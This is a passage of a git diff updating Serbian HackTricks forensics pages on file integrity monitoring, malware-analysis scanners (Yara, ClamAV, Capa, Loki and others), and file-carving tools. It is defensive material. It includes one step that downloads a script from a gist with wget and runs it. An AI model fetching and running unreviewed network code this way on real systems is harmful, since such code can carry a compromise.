buduće poređenje radi otkrivanja modifikacija. +2. **Obaveštenje o Promenama u Realnom Vremenu:** Dobijanje trenutnih obaveštenja kada se datoteke pristupaju ili menjaju, obično putem proširenja jezgra OS-a. ## Alati @@ -37,16 +38,17 @@ Praćenje integriteta datoteka (FIM) je kritična bezbednosna tehnika koja štit * [https://cybersecurity.att.com/blogs/security-essentials/what-is-file-integrity-monitoring-and-why-you-need-it](https://cybersecurity.att.com/blogs/security-essentials/what-is-file-integrity-monitoring-and-why-you-need-it) +{% hint style="success" %} +Učite i vežbajte hakovanje AWS-a:[**HackTricks obuka AWS Red Tim Ekspert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Učite i vežbajte hakovanje GCP-a: [**HackTricks obuka GCP Red Tim Ekspert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)! +Podržite HackTricks -Drugi načini podrške HackTricks-u: - -* Ako želite da vidite **vašu kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu** proverite [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family) -* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitter-u** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume. +* Proverite [**planove pretplate**](https://github.com/sponsors/carlospolop)! +* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Delite hakovanje trikova slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
+{% endhint %} diff --git a/forensics/basic-forensic-methodology/malware-analysis.md b/forensics/basic-forensic-methodology/malware-analysis.md index bbb0fb616..1a216b197 100644 --- a/forensics/basic-forensic-methodology/malware-analysis.md +++ b/forensics/basic-forensic-methodology/malware-analysis.md @@ -1,24 +1,25 @@ # Analiza zlonamernog softvera +{% hint style="success" %} +Naučite i vežbajte hakovanje AWS-a:[**HackTricks Obuka AWS Crveni Tim Stručnjak (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Naučite i vežbajte hakovanje GCP-a: [**HackTricks Obuka GCP Crveni Tim Stručnjak (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)! +Podržite HackTricks -Drugi načini podrške HackTricks-u: - -* Ako želite da vidite **vašu kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu** proverite [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family) -* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitter-u** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume. +* Proverite [**planove pretplate**](https://github.com/sponsors/carlospolop)! +* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Podelite hakovanje trikova slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
+{% endhint %} -## Forenzički CheatSheets +## Forenzički CheatSheet-ovi [https://www.jaiminton.com/cheatsheet/DFIR/#](https://www.jaiminton.com/cheatsheet/DFIR/) -## Online usluge +## Online Servisi * [VirusTotal](https://www.virustotal.com/gui/home/upload) * [HybridAnalysis](https://www.hybrid-analysis.com) @@ -26,7 +27,7 @@ Drugi načini podrške HackTricks-u: * [Intezer](https://analyze.intezer.com) * [Any.Run](https://any.run/) -## Offline antivirusni i detekcioni alati +## Offline Antivirus i Alati za Detekciju ### Yara @@ -36,51 +37,21 @@ sudo apt-get install -y yara ``` #### Priprema pravila -Koristite ovaj skript za preuzimanje i spajanje svih yara pravila za maliciozni softver sa github-a: [https://gist.github.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9](https://gist.github.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9)\ -Kreirajte direktorijum _**rules**_ i izvršite skriptu. Ovo će kreirati fajl nazvan _**malware\_rules.yar**_ koji sadrži sva yara pravila za maliciozni softver. +Koristite ovaj skript za preuzimanje i spajanje svih yara pravila za malver sa github-a: [https://gist.github.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9](https://gist.github.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9)\ +Napravite direktorijum _**rules**_ i izvršite ga. Ovo će kreirati fajl nazvan _**malware\_rules.yar**_ koji sadrži sva yara pravila za malver. ```bash wget https://gist.githubusercontent.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9/raw/4ec711d37f1b428b63bed1f786b26a0654aa2f31/malware_yara_rules.py mkdir rules python malware_yara_rules.py ``` #### Skeniranje - -Skeniranje je prvi korak u analizi malvera. Cilj skeniranja je identifikacija malicioznih datoteka ili aktivnosti na sistemu. Postoje različiti alati i tehnike koje se mogu koristiti za skeniranje malvera. - -##### Statičko skeniranje - -Statičko skeniranje se odnosi na analizu malvera bez njegovog izvršavanja. Ovo se može postići pregledom binarnih datoteka, dekompilacijom izvršnih datoteka ili analizom koda. Statičko skeniranje može otkriti poznate malvera na osnovu prepoznatljivih potpisa ili karakteristika. - -##### Dinamičko skeniranje - -Dinamičko skeniranje se odnosi na analizu malvera tokom njegovog izvršavanja. Ovo se može postići pokretanjem malvera u kontrolisanom okruženju i praćenjem njegovih aktivnosti. Dinamičko skeniranje može otkriti skrivene ili promenljive funkcionalnosti malvera. - -##### Heurističko skeniranje - -Heurističko skeniranje se odnosi na upotrebu heurističkih pravila ili algoritama za otkrivanje nepoznatih malvera. Ovo se može postići analizom ponašanja malvera ili identifikacijom sumnjivih aktivnosti. Heurističko skeniranje može otkriti nove ili prilagođene malvere koji se ne prepoznaju putem statičkog skeniranja. - -##### Skeniranje mreže - -Skeniranje mreže se odnosi na identifikaciju malvera na mrežnom nivou. Ovo se može postići analizom mrežnog saobraćaja, detekcijom sumnjivih veza ili identifikacijom malicioznih IP adresa. Skeniranje mreže može otkriti malvere koji se šire putem mreže ili koriste mrežne resurse za svoje aktivnosti. - -##### Skeniranje memorije - -Skeniranje memorije se odnosi na analizu malvera u operativnoj memoriji. Ovo se može postići pregledom procesa, identifikacijom sumnjivih ili zaraženih procesa, ili pronalaženjem malicioznih injekcija u memoriji. Skeniranje memorije može otkriti malvere koji se izvršavaju u memoriji i izbegavaju detekciju na disku. - -##### Skeniranje registra - -Skeniranje registra se odnosi na analizu malvera u Windows registru. Ovo se može postići identifikacijom sumnjivih unosa registra, pronalaženjem malicioznih ključeva ili analizom promena u registru. Skeniranje registra može otkriti malvere koji koriste registar za svoje aktivnosti ili za održavanje upornosti. - -##### Skeniranje fajl sistema - -Skeniranje fajl sistema se odnosi na analizu malvera na nivou fajl sistema. Ovo se može postići pregledom fajlova, identifikacijom sumnjivih ili zaraženih fajlova, ili pronalaženjem skrivenih fajlova. Skeniranje fajl sistema može otkriti malvere koji se kriju u fajlovima ili koriste fajl sistem za širenje. ```bash yara -w malware_rules.yar image #Scan 1 file yara -w malware_rules.yar folder #Scan the whole folder ``` -#### YaraGen: Proverite za zlonamerni softver i kreirajte pravila +#### YaraGen: Provera malvera i kreiranje pravila -Možete koristiti alatku [**YaraGen**](https://github.com/Neo23x0/yarGen) da generišete yara pravila iz binarnog fajla. Pogledajte ove tutorijale: [**Deo 1**](https://www.nextron-systems.com/2015/02/16/write-simple-sound-yara-rules/), [**Deo 2**](https://www.nextron-systems.com/2015/10/17/how-to-write-simple-but-sound-yara-rules-part-2/), [**Deo 3**](https://www.nextron-systems.com/2016/04/15/how-to-write-simple-but-sound-yara-rules-part-3/) +Možete koristiti alatku [**YaraGen**](https://github.com/Neo23x0/yarGen) za generisanje yara pravila iz binarnog fajla. Pogledajte ove tutorijale: [**Deo 1**](https://www.nextron-systems.com/2015/02/16/write-simple-sound-yara-rules/), [**Deo 2**](https://www.nextron-systems.com/2015/10/17/how-to-write-simple-but-sound-yara-rules-part-2/), [**Deo 3**](https://www.nextron-systems.com/2016/04/15/how-to-write-simple-but-sound-yara-rules-part-3/) ```bash python3 yarGen.py --update python3.exe yarGen.py --excludegood -m ../../mals/ @@ -88,85 +59,10 @@ python3.exe yarGen.py --excludegood -m ../../mals/ ### ClamAV #### Instalacija - -Da biste instalirali ClamAV, možete koristiti sledeće komande: - -```bash -sudo apt-get update -sudo apt-get install clamav -``` - -#### Ažuriranje baza podataka - -Nakon instalacije, trebali biste ažurirati baze podataka ClamAV-a. To možete uraditi pomoću sledeće komande: - -```bash -sudo freshclam -``` - -#### Skeniranje fajlova - -Da biste skenirali određeni fajl ili direktorijum, koristite sledeću komandu: - -```bash -clamscan -``` - -#### Izveštaj o skeniranju - -Da biste generisali izveštaj o skeniranju, koristite sledeću komandu: - -```bash -clamscan -r --bell -i > izvestaj.txt -``` - -Ova komanda će generisati izveštaj o skeniranju i sačuvati ga u fajlu "izvestaj.txt". ``` sudo apt-get install -y clamav ``` #### Skeniranje - -Skeniranje je prvi korak u analizi malvera. Cilj skeniranja je identifikacija malicioznih datoteka ili aktivnosti na sistemu. Postoje različiti alati i tehnike koje se mogu koristiti za skeniranje malvera. - -##### Antivirus skeniranje - -Antivirusni softver je jedan od najčešćih alata koji se koristi za skeniranje malvera. On analizira datoteke i sistem kako bi pronašao potencijalno zlonamerne ili sumnjive aktivnosti. Antivirusni softver koristi bazu podataka sa potpisima malvera kako bi prepoznao poznate maliciozne datoteke. Međutim, ova metoda ima ograničenja jer se oslanja samo na prepoznavanje poznatih malvera. - -##### Heurističko skeniranje - -Heurističko skeniranje je tehnika koja se koristi za otkrivanje novih ili nepoznatih malvera. Umesto da se oslanja na bazu podataka sa potpisima, heurističko skeniranje analizira ponašanje datoteka i sistema kako bi identifikovalo sumnjive aktivnosti. Ova tehnika može biti efikasnija u otkrivanju novih malvera, ali takođe može generisati lažno pozitivne rezultate. - -##### Analiza paketa - -Analiza paketa je proces pregledanja mrežnog saobraćaja kako bi se identifikovali maliciozni ili sumnjivi paketi. Ova tehnika može otkriti malver koji koristi mrežu za komunikaciju sa kontrolnim serverima ili za prenos podataka. Alati poput Wireshark-a mogu se koristiti za analizu paketa. - -##### Analiza registra - -Analiza registra je proces pregledanja registra sistema kako bi se identifikovali maliciozni unos ili promene. Malveri često koriste registar za postavljanje svojih ključeva i vrednosti kako bi ostali prisutni na sistemu. Pregledanje registra može otkriti sumnjive unose koji ukazuju na prisustvo malvera. - -##### Analiza datoteka - -Analiza datoteka uključuje pregledanje malicioznih datoteka kako bi se identifikovali njihovi karakteristični atributi. Ovo može uključivati pregledanje metapodataka, analizu sadržaja datoteke ili izvršavanje datoteke u sandbox okruženju radi identifikacije malicioznih aktivnosti. - -##### Analiza ponašanja - -Analiza ponašanja je proces praćenja aktivnosti malvera na sistemu kako bi se identifikovali njegovi koraci i efekti. Ovo može uključivati praćenje mrežne komunikacije, promene u sistemskim datotekama ili registrovanje aktivnosti u logovima. Praćenje ponašanja malvera može pružiti uvid u njegove funkcionalnosti i ciljeve. - -##### Analiza malvera u sandbox okruženju - -Sandbox okruženje je izolovano okruženje u kojem se malver može izvršiti radi analize njegovih aktivnosti. Ovo omogućava istraživačima da prate ponašanje malvera i identifikuju njegove funkcionalnosti bez rizika od infekcije sistema. Sandbox okruženje može biti korisno za otkrivanje skrivenih funkcionalnosti malvera ili za identifikaciju novih varijanti. - -##### Analiza malvera u virtualnoj mašini - -Virtualna mašina je softversko okruženje koje emulira fizički računar. Analiza malvera u virtualnoj mašini omogućava istraživačima da izvrše malver u kontrolisanom okruženju i prate njegove aktivnosti. Ovo može biti korisno za identifikaciju malvera koji su dizajnirani da izbegnu otkrivanje u sandbox okruženju. - -##### Analiza malvera u kontejneru - -Kontejner je izolovano okruženje koje omogućava izvršavanje aplikacija i procesa. Analiza malvera u kontejneru omogućava istraživačima da izvrše malver u izolovanom okruženju i prate njegove aktivnosti. Ovo može biti korisno za identifikaciju malvera koji su dizajnirani da izbegnu otkrivanje u virtualnim mašinama ili sandbox okruženjima. - -##### Analiza malvera u oblaku - -Analiza malvera u oblaku omogućava istraživačima da izvrše malver na udaljenom serveru i prate njegove aktivnosti. Ovo može biti korisno za identifikaciju malvera koji su dizajnirani da izbegnu otkrivanje u lokalnim okruženjima. ```bash sudo freshclam #Update rules clamscan filepath #Scan 1 file @@ -174,25 +70,25 @@ clamscan folderpath #Scan the whole folder ``` ### [Capa](https://github.com/mandiant/capa) -**Capa** otkriva potencijalno zlonamerne **sposobnosti** u izvršnim datotekama: PE, ELF, .NET. Dakle, pronaći će stvari poput Att\&ck taktika ili sumnjivih sposobnosti kao što su: +**Capa** otkriva potencijalno zlonamerne **sposobnosti** u izvršnim datotekama: PE, ELF, .NET. Tako će pronaći stvari poput Att\&ck taktika ili sumnjivih sposobnosti kao što su: -* provera greške OutputDebugString -* pokretanje kao servis -* kreiranje procesa +- provera greške OutputDebugString +- pokretanje kao servis +- kreiranje procesa Preuzmite ga sa [**Github repozitorijuma**](https://github.com/mandiant/capa). -### IOC-ovi +### IOCs -IOC znači Indikator kompromitacije. IOC je skup **uslova koji identifikuju** potencijalno neželjeni softver ili potvrđeni **malver**. Plavi timovi koriste ovu vrstu definicije da **traže ovu vrstu zlonamernih datoteka** u svojim **sistemima** i **mrežama**.\ -Deljenje ovih definicija je veoma korisno jer kada se malver identifikuje na računaru i IOC za taj malver se kreira, drugi Plavi timovi ga mogu koristiti da brže identifikuju malver. +IOC znači Indikator kompromitovanja. IOC je skup **uslova koji identifikuju** neki potencijalno neželjeni softver ili potvrđeni **malver**. Plave ekipe koriste ovu vrstu definicije da **traže ovu vrstu zlonamernih datoteka** u svojim **sistemima** i **mrežama**.\ +Deljenje ovih definicija je veoma korisno jer kada se malver identifikuje na računaru i IOC za taj malver se kreira, druge Plave ekipe ga mogu koristiti da identifikuju malver brže. -Alatka za kreiranje ili modifikaciju IOC-ova je [**IOC Editor**](https://www.fireeye.com/services/freeware/ioc-editor.html)**.**\ -Možete koristiti alatke poput [**Redline**](https://www.fireeye.com/services/freeware/redline.html) da **tražite definisane IOC-ove na uređaju**. +Alat za kreiranje ili modifikaciju IOCs je [**IOC Editor**](https://www.fireeye.com/services/freeware/ioc-editor.html)**.**\ +Možete koristiti alate poput [**Redline**](https://www.fireeye.com/services/freeware/redline.html) da **tražite definisane IOCs na uređaju**. ### Loki -[**Loki**](https://github.com/Neo23x0/Loki) je skener za jednostavne indikatore kompromitacije.\ +[**Loki**](https://github.com/Neo23x0/Loki) je skener za Jednostavne Indikatore kompromitovanja.\ Detekcija se zasniva na četiri metode detekcije: ``` 1. File Name IOC @@ -209,41 +105,41 @@ Compares process connection endpoints with C2 IOCs (new since version v.10) ``` ### Linux Malware Detect -[**Linux Malware Detect (LMD)**](https://www.rfxn.com/projects/linux-malware-detect/) je skener zlonamernog softvera za Linux koji je objavljen pod GNU GPLv2 licencom, a dizajniran je za pretnje sa kojima se susreću u deljenim hosting okruženjima. Koristi podatke o pretnjama sa sistema za otkrivanje upada na mrežnom rubu kako bi izdvojio zlonamerni softver koji se aktivno koristi u napadima i generiše potpise za detekciju. Pored toga, podaci o pretnjama se takođe dobijaju iz korisničkih prijava putem funkcije LMD checkout i resursa zajednice za zlonamerni softver. +[**Linux Malware Detect (LMD)**](https://www.rfxn.com/projects/linux-malware-detect/) je skener zlonamernih programa za Linux koji je objavljen pod GNU GPLv2 licencom, a dizajniran je oko pretnji sa kojima se susreću u deljenim hosting okruženjima. Koristi podatke o pretnjama iz sistema za otkrivanje upada na mrežnom rubu kako bi izdvojio zlonamerne programe koji se aktivno koriste u napadima i generiše potpise za detekciju. Pored toga, podaci o pretnjama takođe potiču iz korisničkih podnesaka sa funkcijom provere LMD i resursima zajednice zlonamernih programa. ### rkhunter -Alati poput [**rkhunter**](http://rkhunter.sourceforge.net) mogu se koristiti za proveru datotečnog sistema radi mogućih **rootkitova** i zlonamernog softvera. +Alati poput [**rkhunter**](http://rkhunter.sourceforge.net) mogu se koristiti za proveru datotečnog sistema radi mogućih **rootkit**-ova i zlonamernih programa. ```bash sudo ./rkhunter --check -r / -l /tmp/rkhunter.log [--report-warnings-only] [--skip-keypress] ``` ### FLOSS -[**FLOSS**](https://github.com/mandiant/flare-floss) je alat koji će pokušati da pronađe obfuskirane stringove unutar izvršnih datoteka koristeći različite tehnike. +[**FLOSS**](https://github.com/mandiant/flare-floss) je alatka koja će pokušati da pronađe prikrivene stringove unutar izvršnih datoteka koristeći različite tehnike. ### PEpper -[PEpper](https://github.com/Th3Hurrican3/PEpper) proverava neke osnovne stvari unutar izvršne datoteke (binarni podaci, entropija, URL-ovi i IP adrese, neka pravila yara). +[PEpper ](https://github.com/Th3Hurrican3/PEpper) proverava neke osnovne stvari unutar izvršne datoteke (binarni podaci, entropija, URL-ovi i IP adrese, neka yara pravila). ### PEstudio -[PEstudio](https://www.winitor.com/download) je alat koji omogućava dobijanje informacija o Windows izvršnim datotekama kao što su uvozi, izvozi, zaglavlja, ali takođe će proveriti virus total i pronaći potencijalne Att\&ck tehnike. +[PEstudio](https://www.winitor.com/download) je alatka koja omogućava dobijanje informacija o Windows izvršnim datotekama kao što su uvozi, izvozi, zaglavlja, ali takođe će proveriti VirusTotal i pronaći potencijalne Att\&ck tehnike. ### Detect It Easy(DiE) -[**DiE**](https://github.com/horsicq/Detect-It-Easy/) je alat za otkrivanje da li je datoteka **šifrovana** i takođe pronalazi **pakere**. +[**DiE**](https://github.com/horsicq/Detect-It-Easy/) je alatka za otkrivanje da li je datoteka **šifrovana** i takođe pronalazi **pakere**. ### NeoPI -[**NeoPI**](https://github.com/CiscoCXSecurity/NeoPI) je Python skripta koja koristi razne **statističke metode** za otkrivanje **obfuskiranog** i **šifrovanog** sadržaja unutar tekstualnih/skriptnih datoteka. Namera NeoPI-ja je da pomogne u **otkrivanju skrivenog koda web školjki**. +[**NeoPI** ](https://github.com/CiscoCXSecurity/NeoPI) je Python skripta koja koristi različite **statističke metode** za otkrivanje **prikrivenog** i **šifrovanog** sadržaja unutar tekstualnih/skript fajlova. Namera NeoPI-ja je da pomogne u **otkrivanju skrivenog koda web ljuski**. ### **php-malware-finder** -[**PHP-malware-finder**](https://github.com/nbs-system/php-malware-finder) se najbolje trudi da otkrije **obfuskirani**/**sumnjivi kod** kao i datoteke koje koriste **PHP** funkcije često korištene u **malverima**/web školjkama. +[**PHP-malware-finder**](https://github.com/nbs-system/php-malware-finder) daje sve od sebe da otkrije **prikriveni**/**sumnjivi kod** kao i fajlove koji koriste **PHP** funkcije često korištene u **malverima**/web ljuskama. -### Apple binarne potpise +### Apple Binary Signatures -Prilikom provere nekog **uzorka malvera** uvek treba **proveriti potpis** binarne datoteke jer se **razvijač** koji ga je potpisao može već **povezivati** sa **malverom**. +Prilikom provere nekog **uzorka malvera** uvek treba **proveriti potpis** binarne datoteke jer **razvojni programer** koji ju je potpisao može već biti **povezan** sa **malverom**. ```bash #Get signer codesign -vv -d /bin/ls 2>&1 | grep -E "Authority|TeamIdentifier" @@ -256,28 +152,29 @@ spctl --assess --verbose /Applications/Safari.app ``` ## Tehnike otkrivanja -### Stacking datoteka +### Stapanje fajlova -Ako znate da se neki folder koji sadrži **datoteke** veb servera **poslednji put ažurirao na neki datum**, **proverite** datum kada su sve **datoteke** na veb serveru kreirane i izmenjene, i ako je bilo koji datum **sumnjiv**, proverite tu datoteku. +Ako znate da je neki folder koji sadrži **fajlove** veb servera **poslednji put ažuriran na određeni datum**. **Proverite** datum kada su **fajlovi** na **veb serveru kreirani i menjani** i ako je bilo koji datum **sumnjiv**, proverite taj fajl. -### Referentne vrednosti +### Osnovne linije -Ako se **datoteke** u folderu **ne bi trebale menjati**, možete izračunati **heš** **originalnih datoteka** u folderu i **uporediti** ih sa **trenutnim**. Sve što je izmenjeno biće **sumnjivo**. +Ako fajlovi u folderu **ne bi trebalo da su menjani**, možete izračunati **heš** originalnih fajlova iz foldera i **uporediti** ih sa **trenutnim**. Sve što je izmenjeno biće **sumnjivo**. ### Statistička analiza -Kada se informacije čuvaju u logovima, možete **proveriti statistiku kao što je koliko puta je svaka datoteka veb servera pristupana, jer web šel može biti jedan od najčešćih**. +Kada se informacije čuvaju u logovima, možete **proveriti statistiku kao koliko puta je svaki fajl veb servera pristupljen jer bi web ljuska mogla biti jedna od najčešćih**. + +{% hint style="success" %} +Naučite i vežbajte hakovanje AWS:[**HackTricks Obuka AWS Crveni Tim Stručnjak (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Naučite i vežbajte hakovanje GCP-a: [**HackTricks Obuka GCP Crveni Tim Stručnjak (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)! +Podržite HackTricks -Drugi načini podrške HackTricks-u: - -* Ako želite da vidite **oglašavanje vaše kompanije na HackTricks-u** ili **preuzmete HackTricks u PDF formatu**, proverite [**PLANOVE ZA PRETPLATU**](https://github.com/sponsors/carlospolop)! -* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family) -* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitter-u** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume. +* Proverite [**planove pretplate**](https://github.com/sponsors/carlospolop)! +* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Podelite hakovanje trikova slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
+{% endhint %} diff --git a/forensics/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-tools.md b/forensics/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-tools.md index 9a23f26c7..e4147209f 100644 --- a/forensics/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-tools.md +++ b/forensics/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-tools.md @@ -1,28 +1,29 @@ +{% hint style="success" %} +Učite i vežbajte hakovanje AWS-a:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Učite i vežbajte hakovanje GCP-a: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)! +Podržite HackTricks -Drugi načini podrške HackTricks-u: - -* Ako želite da vidite **vašu kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu** proverite [**PLANOVE ZA PRETPLATU**](https://github.com/sponsors/carlospolop)! -* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family) -* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitter-u** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume. +* Proverite [**planove pretplate**](https://github.com/sponsors/carlospolop)! +* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Podelite hakovanje trikova slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
+{% endhint %} # Alati za izdvajanje podataka -## Autopsy +## Autopsija -Najčešći alat koji se koristi u forenzici za izdvajanje fajlova iz slika je [**Autopsy**](https://www.autopsy.com/download/). Preuzmite ga, instalirajte ga i omogućite mu da obradi fajl kako bi pronašao "skrivene" fajlove. Imajte na umu da je Autopsy napravljen da podržava disk slike i druge vrste slika, ali ne i obične fajlove. +Najčešći alat koji se koristi u forenzici za izdvajanje fajlova iz slika je [**Autopsija**](https://www.autopsy.com/download/). Preuzmite ga, instalirajte ga i podesite da obradi fajl kako bi pronašao "skrivene" fajlove. Imajte na umu da je Autopsija napravljena da podržava disk slike i druge vrste slika, ali ne i obične fajlove. ## Binwalk -**Binwalk** je alat za pretragu binarnih fajlova kao što su slike i audio fajlovi u potrazi za ugrađenim fajlovima i podacima. -Može se instalirati pomoću `apt` komande, međutim [izvorni kod](https://github.com/ReFirmLabs/binwalk) se može pronaći na github-u. +**Binwalk** je alat za pretragu binarnih fajlova poput slika i audio fajlova za ugrađene fajlove i podatke. +Može se instalirati pomoću `apt` međutim [izvor](https://github.com/ReFirmLabs/binwalk) se može pronaći na github-u. **Korisne komande**: ```bash sudo apt install binwalk #Insllation @@ -32,7 +33,7 @@ binwalk --dd ".*" file #Displays and extracts all files from the given file ``` ## Foremost -Još jedan čest alat za pronalaženje skrivenih datoteka je **foremost**. Konfiguracionu datoteku za foremost možete pronaći u `/etc/foremost.conf`. Ako želite samo da pretražujete određene datoteke, uklonite komentare sa njih. Ako ne uklonite komentare, foremost će pretraživati podrazumevane konfigurisane vrste datoteka. +Još jedan čest alat za pronalaženje skrivenih datoteka je **foremost**. Konfiguracionu datoteku za foremost možete pronaći u `/etc/foremost.conf`. Ako želite da pretražujete samo određene datoteke, uklonite komentare ispred njih. Ako ne uklonite komentare, foremost će pretraživati prema svojim podrazumevanim konfigurisanim tipovima datoteka. ```bash sudo apt-get install foremost foremost -v -i file.img -o output @@ -40,54 +41,55 @@ foremost -v -i file.img -o output ``` ## **Skalpel** -**Skalpel** je još jedan alat koji se može koristiti za pronalaženje i izdvajanje **datoteka ugrađenih u datoteku**. U ovom slučaju, trebaće vam da uklonite komentare iz konfiguracione datoteke \(_/etc/scalpel/scalpel.conf_\) za vrste datoteka koje želite da izdvojite. +**Skalpel** je još jedan alat koji se može koristiti za pronalaženje i izdvajanje **datoteka ugrađenih u datoteku**. U ovom slučaju, moraćete da uklonite komentare iz konfiguracione datoteke \(_/etc/scalpel/scalpel.conf_\) za vrste datoteka koje želite da izdvojite. ```bash sudo apt-get install scalpel scalpel file.img -o output ``` ## Bulk Extractor -Ovaj alat dolazi unutar Kali operativnog sistema, ali ga možete pronaći i ovde: [https://github.com/simsong/bulk\_extractor](https://github.com/simsong/bulk_extractor) +Ovaj alat dolazi unutar kali distribucije, ali ga možete pronaći ovde: [https://github.com/simsong/bulk\_extractor](https://github.com/simsong/bulk_extractor) -Ovaj alat može skenirati sliku i **izvući pcaps** unutar nje, **informacije o mreži (URL-ovi, domeni, IP adrese, MAC adrese, mejlovi)** i još **datoteke**. Samo trebate: +Ovaj alat može skenirati sliku i **izdvojiti pcaps** unutar nje, **mrežne informacije \(URL-ove, domene, IP adrese, MAC adrese, mejlove\)** i više **datoteka**. Samo treba da uradite: ```text bulk_extractor memory.img -o out_folder ``` -Pregledajte **sve informacije** koje je alat prikupio \(lozinke?\), **analizirajte** pakete \(pročitajte [**Pcaps analizu**](../pcap-inspection/)\), tražite **čudne domene** \(domene povezane s **malverom** ili **ne-postojeće**\). +Prođite kroz **sve informacije** koje je alat prikupio \(lozinke?\), **analizirajte** **pakete** \(pročitajte [**Analiza Pcap datoteka**](../pcap-inspection/)\), tražite **čudne domene** \(domene povezane sa **malverom** ili **ne-postojeće**\). ## PhotoRec Možete ga pronaći na [https://www.cgsecurity.org/wiki/TestDisk\_Download](https://www.cgsecurity.org/wiki/TestDisk_Download) -Dolazi s verzijom GUI i 